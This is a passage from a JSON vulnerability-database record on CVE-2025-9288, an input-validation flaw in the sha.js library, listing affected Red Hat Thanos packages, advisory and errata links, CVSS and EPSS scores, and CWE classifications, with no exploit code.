o/packages/pkg:rpm/redhat/thanos@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89334?format=json","purl":"pkg:rpm/redhat/thanos-receive-controller@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/thanos-receive-controller@container-v2.12%3Farch=5-3"}],"references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9288.json","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9288.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-9288","reference_id":"","reference_type":"","scores":[{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13819","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13778","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.1381","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.1376","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13677","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13875","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13682","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13673","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13599","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13603","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13692","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.13741","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.1499","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.1512","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15177","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.17827","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.17929","published_at":"2026-05-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-9288"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9288","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9288"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/browserify/sha.js","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/browserify/sha.js"},{"reference_url":"https://github.com/browserify/sha.js/commit/f2a258e9f2d0fcd113bfbaa49706e1ac0d979ba5","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/browserify/sha.js/commit/f2a258e9f2d0fcd113bfbaa49706e1ac0d979ba5"},{"reference_url":"https://github.com/browserify/sha.js/pull/78","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:33Z/"}],"url":"https://github.com/browserify/sha.js/pull/78"},{"reference_url":"https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:33Z/"}],"url":"https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2025/09/msg00016.html","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2025/09/msg00016.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-9288","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-9288"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2025-9287","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:33Z/"}],"url":"https://www.cve.org/CVERecord?id=CVE-2025-9287"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111769","reference_id":"1111769","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111769"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2389980","reference_id":"2389980","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2389980"},{"reference_url":"https://github.com/advisories/GHSA-95m3-7q98-8xr5","reference_id":"GHSA-95m3-7q98-8xr5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-95m3-7q98-8xr5"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:14474","reference_id":"RHSA-2025:14474","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:14474"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:14767","reference_id":"RHSA-2025:14767","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:14767"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:15847","reference_id":"RHSA-2025:15847","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:15847"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:16020","reference_id":"RHSA-2025:16020","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:16020"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:18278","reference_id":"RHSA-2025:18278","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:18278"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:18744","reference_id":"RHSA-2025:18744","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:18744"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:22905","reference_id":"RHSA-2025:22905","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:22905"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3710","reference_id":"RHSA-2026:3710","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3710"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3712","reference_id":"RHSA-2026:3712","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3712"},{"reference_url":"https://usn.ubuntu.com/7778-1/","reference_id":"USN-7778-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7778-1/"}],"weaknesses":[{"cwe_id":20,"name":"Improper Input Validation","description":"The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly."},{"cwe_id":937,"name":"OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013."},{"cwe_id":1035,"name":"OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017."}],"exploits":[],"severity_range_score":"7.7 - 10.0","exploitability":"0.5","weighted_severity":"9.0","risk_score":4.5,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eraj-dyxs-xkfd"}